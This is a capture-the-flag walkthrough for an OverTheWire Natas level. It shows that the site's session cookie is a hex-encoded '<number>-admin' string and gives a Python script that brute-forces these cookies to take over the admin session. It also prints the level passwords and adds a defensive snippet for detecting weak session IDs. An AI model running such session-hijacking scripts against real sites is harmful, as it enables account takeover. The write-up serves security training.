Natas20
Website URL: http://overthewire.org/wargames/natas/natas20.html
According to the data on the OverTheWire webpage.
Username: natas20
URL: http://natas20.natas.labs.overthewire.org
Let’s log into the URL for Natas19

This time there is no source code to view, so we have to work from what we learned in the previous level. Let's log in with dummy credentials and intercept the POST request to see the PHPSESSID.

The PHPSESSID is set to 3332302d61646d696e. It is clearly no longer restricted to a number below 640, and at this length a brute-force attack is nowhere near as feasible as we'd like it to be.
Repeating this a couple of times, you'll observe that the last few characters, viz. "2d61646d696e", remain the same. This indicates that there is some pattern behind the generation of the session ID. Since the generated session IDs share this suffix, it is likely that the value is encoded in some way. Let's use the Decoder in Burp Suite to test it out.

So, the session ID is simply the ASCII string "<number>-admin" encoded as hex characters. Pretty easy now. We'll use a script similar to last time, trying IDs up to 640, except that this time we hex-encode the value before setting it in the cookie.

import requests
from requests.auth import HTTPBasicAuth


def main():
    # HTTP basic auth for the current level (natas19 credentials obtained from the previous level)
    auth = HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
    data = {'username': 'admin', 'password': 'admin', 'admin': '1'}
    for i in range(0, 640):
        # Session IDs are "<number>-admin" hex-encoded; build and try each candidate
        sessstr = str(i) + '-admin'
        sessid = sessstr.encode('ascii').hex()  # Python 3 equivalent of the old .encode('hex')
        cookie = {"PHPSESSID": sessid}
        r = requests.get("http://natas19.natas.labs.overthewire.org/index.php?debug",
                         params=data, auth=auth, cookies=cookie)
        # The page says "logged in as a regular user" for every non-admin session
        if 'logged in as a regular user' not in r.text:
            print("Admin:", i)
            print(r.text)
            break


if __name__ == '__main__':
    main()
Running it might take a couple of minutes.

Done!
Password for next level: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
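As an added example, not part of the original write-up, here is the defender-side view of the same weakness in Python: a check that decodes a PHPSESSID value, recognises the "<number>-<username>" scheme described above, and shows the kind of random token a session cookie should carry instead. The observed cookie value is the one from this page; the function names are my own.

```python
import re
import secrets
from typing import Optional, Tuple

# Constructed sample: the PHPSESSID value observed in this level's write-up.
OBSERVED_SESSID = "3332302d61646d696e"

# The weak scheme: a decimal counter, a dash, then the user name.
WEAK_PATTERN = re.compile(r"^(\d+)-([A-Za-z0-9_]+)$")


def decode_sessid(hex_id: str) -> Optional[str]:
    """Turn a hex-encoded session ID back into the ASCII it was built from.
    Returns None when the value is not hex, or not printable ASCII."""
    try:
        return bytes.fromhex(hex_id).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_weak_sessid(hex_id: str) -> Optional[Tuple[int, str]]:
    """Return (counter, username) if the cookie follows the weak scheme, else None.
    A session store audit can run this over live cookies to flag the pattern."""
    decoded = decode_sessid(hex_id)
    if decoded is None:
        return None
    match = WEAK_PATTERN.match(decoded)
    if match is None:
        return None
    return int(match.group(1)), match.group(2)


def secure_sessid(nbytes: int = 16) -> str:
    """What the cookie should look like instead: bytes from the OS CSPRNG, hex-encoded.
    16 bytes gives 2**128 possibilities and carries no user-derived structure."""
    return secrets.token_hex(nbytes)


def main() -> None:
    print(decode_sessid(OBSERVED_SESSID))       # 320-admin
    print(parse_weak_sessid(OBSERVED_SESSID))   # (320, 'admin')
    print(parse_weak_sessid(secure_sessid()))   # None: a random token has no such shape


if __name__ == "__main__":
    main()
```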